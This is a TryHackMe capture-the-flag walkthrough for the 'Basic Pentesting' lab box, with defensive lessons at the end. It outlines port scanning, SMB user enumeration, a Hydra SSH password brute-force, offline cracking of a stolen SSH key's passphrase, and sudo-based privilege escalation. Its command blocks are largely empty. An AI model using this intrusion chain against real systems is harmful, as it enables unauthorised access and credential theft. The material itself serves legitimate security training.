TryHackMe Basic Pentesting Walkthrough: Enumeration to Root (With Command Output)

Basic Pentesting is one of TryHackMe's most popular Easy rooms because it walks you through a complete, realistic workflow: scan the box, enumerate a web server and SMB, discover usernames, brute-force SSH with Hydra, crack an encrypted SSH key with John the Ripper to pivot to another user, and finally escalate to root.

This version of the guide shows the commands and example output at each stage, so you know exactly what to look for on your own run.

The terminal output below is illustrative — IPs, hostnames, and timing will differ on your machine. Cracked passwords, key passphrases, and flags are redacted ([REDACTED] / THM{...}) so you still earn them. Replace <IP> with your target's IP and <YOUR_IP> with your TryHackMe VPN IP (tun0).

Tools you'll use: rustscan, nmap, gobuster, enum4linux, hydra, ssh, ssh2john, and john.

---

Task 1 — Deploy & Recon

Start the machine, connect via the TryHackMe VPN (or AttackBox), and note the target IP.

Step 1 — Fast port scan with Rustscan

Rustscan races through all 65,535 ports, then pipes the open ones into nmap:

Example output (trimmed):

Step 2 — Detailed scan with nmap

If you prefer to run nmap separately (or scope it to the ports Rustscan found):

Example output (key lines):

Reading the results: we have SSH (22), an Apache web server (80), Samba/SMB (139/445), and Tomcat (8080). Multiple services = multiple enumeration angles. SMB is especially interesting because it often leaks usernames.

---

Task 2 — Web Enumeration

Visit http://<IP>/ — it's a basic "under maintenance" page. Always check the page source for hints:

Example output:

That hint points at a dev section. Brute-force directories with Gobuster:

Example output:

Open /development/ and read the files inside:

Example output:

Reading the results: two correspondents (initials K and J), confirmation that SMB is in use, and a big hint that user "J" has a weak password. That tells us exactly who to target with Hydra.

---

Task 3 — SMB Enumeration

Since SMB is running, enumerate it to pull usernames before any noisy brute-forcing. enum4linux automates Samba/Windows enumeration:

Example output (the part that matters):

Reading the results: two real usernames — kay and jan. The dev note said J had the weak password, so jan is our brute-force target.

---

Task 4 — Brute-Force SSH with Hydra

Use Hydra to try passwords from rockyou.txt against SSH for jan:

• -l jan → single username
• -P → password wordlist
• -t 4 → 4 parallel tasks (gentler on SSH)
• -f → stop after the first valid hit

Example output:

Log in with the recovered password:

---

Task 5 — Pivot to the Second User (Crack the SSH Key)

jan is a low-privilege user. Look around the home directories — kay has an SSH key folder you can read:

Example output:

Copy the contents of id_rsa to your own machine as kay_id_rsa. It's passphrase-protected, so convert it to a hash and crack the passphrase offline with John the Ripper:

Example output:

Lock down the key's permissions and SSH in as kay:

In kay's home directory you'll find the user-related backup file and the flag:

---

Task 6 — Privilege Escalation to Root

With a foothold as kay, check what you can do. The fastest first checks:

Example sudo -l output:

For automated enumeration, LinPEAS highlights misconfigurations for you:

Follow the highlighted vector (here, the pass.bak credential / sudo rights) to become root, then grab the final flag:

🎉 Box rooted!

---

Summary: The Attack Path

Stage	Tool / Technique	Result
Recon	rustscan -> nmap	Found SSH, HTTP, SMB, Tomcat
Web enum	gobuster	Found /development/ + dev notes
SMB enum	enum4linux	Discovered kay and jan
Credential attack	hydra	Cracked jan's SSH password
Pivot	ssh2john + john	Cracked kay's SSH key passphrase
Privilege escalation	sudo -l / LinPEAS	Root

---

What You Learned (and How to Defend It)

Basic Pentesting is a chain of small misconfigurations — exactly how real breaches happen:

• Don't leave hints in web roots. Dev notes, version numbers, and "to-do" files give attackers a roadmap.
• Lock down SMB. Over-permissive SMB leaks usernames that turn slow brute-forcing into a targeted attack.
• Enforce strong passwords. A weak password falls to rockyou.txt in seconds via Hydra.
• Protect private keys. A world-readable id_rsa plus a weak passphrase is game over — ssh2john cracks weak passphrases offline.
• Audit sudo and SUID. Run sudo -l, find -perm -u=s, and tools like LinPEAS on your own hosts before an attacker does.

---

Handy Reference Commands

---

For educational use only. TryHackMe is a legal, sandboxed lab. Never use these techniques against systems you don't own or aren't explicitly authorised to test.